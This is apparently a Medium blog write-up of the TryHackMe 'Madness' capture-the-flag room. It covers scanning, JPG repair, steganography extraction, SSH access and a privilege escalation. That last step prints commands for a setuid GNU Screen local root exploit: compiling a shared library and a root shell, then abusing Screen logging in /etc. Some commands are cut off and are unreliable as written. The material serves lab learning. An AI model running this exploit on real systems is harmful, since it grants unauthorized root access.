TryHackMe: Madness

Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial

Let’s check the site

As you can see, there is a picture icon above. Let’s click on it.

There are no picture. Let’s download and make some changes.

Command: wget

The .jpg file is corrupted. Let’s fix it.

Command: hexeditor thm.jpg

Now let’s try again.

We are provided with a hidden directory.

I was just checking and came across something like this.

There was another hint in the source code.

Open burpsuite and check one by one

And that’s it. We got different results

When we look at the site, we get such a result.

Maybe the image we download needed again. Because this is the steganography code.

Command: steghide info thm.jpg

Command: steghide — extract -sf thm.jpg

Let’s try to crack the hash we got

I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements.
Let’s check.

We found the password, let’s enter.

Privilege Escalation

Command: find / -perm -u=s 2>/dev/null

We see something different. Let’s check the exploit.

I created the files in my terminal and transferred them to the target terminal

And I entered the commands.

Command: gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c

Command: gcc -o /tmp/rootshell /tmp/rootshell.c

Command: echo “[+] Now we create our /etc/ file…”

Command: cd /etc

Command: umask 000

Command: screen -D -m -L echo -ne “\x0a/tmp/”

Command: echo “[+] Triggering…”

Command: screen -ls

Command: /tmp/rootshell

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Create a Background Worker for a Flask App (on Heroku) without Redis

How to Deploy an EKS stack in AWS?

Useful One Liners in HTML

Reducing typo errors with enum

Tutorial to Configure SSL in an HAProxy Load Balancer

9 libraries for your next Flutter project

How To Code OpenGl In Visual Studio

版本控制(version control)實在太重要了 (上) 沒有的話我會想離職

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Exploitable CTF 1 Writeup

Mnemonic THM Writeup

Basic Pentesting CTF Walkthrough TryHackMe

Tryhackme Archangel Writeup